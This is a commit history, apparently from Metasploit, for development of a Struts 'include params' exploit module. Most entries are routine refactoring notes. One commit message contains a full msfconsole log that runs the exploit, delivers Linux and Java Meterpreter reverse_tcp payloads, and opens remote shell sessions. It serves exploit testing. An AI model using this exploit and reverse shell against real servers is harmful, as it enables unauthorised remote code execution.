Console
|
eb4162d41b
|
boolean issue fix
|
2013-05-30 18:15:33 +01:00 |
Console
|
5fa8ecd334
|
removed magic number 109
now calculated from the actual length of all static URL elements
|
2013-05-30 17:40:43 +01:00 |
Console
|
47524a0570
|
converted request params to hash merge operation
|
2013-05-30 15:36:01 +01:00 |
Console
|
51879ab9c7
|
removed unnecessary lines
|
2013-05-30 15:15:10 +01:00 |
Console
|
abb0ab12f6
|
Fix msftidy compliance
|
2013-05-30 13:10:24 +01:00 |
Console
|
5233ac4cbd
|
Progress bar instead of message spam.
|
2013-05-30 13:08:43 +01:00 |
Console
|
fb388c6463
|
Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
|
2013-05-30 11:30:24 +01:00 |
Console
|
ab6a2a049b
|
Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
|
2013-05-30 10:35:29 +01:00 |
Console
|
d70526f4cc
|
Renamed as per suggestion
|
2013-05-30 09:29:26 +01:00 |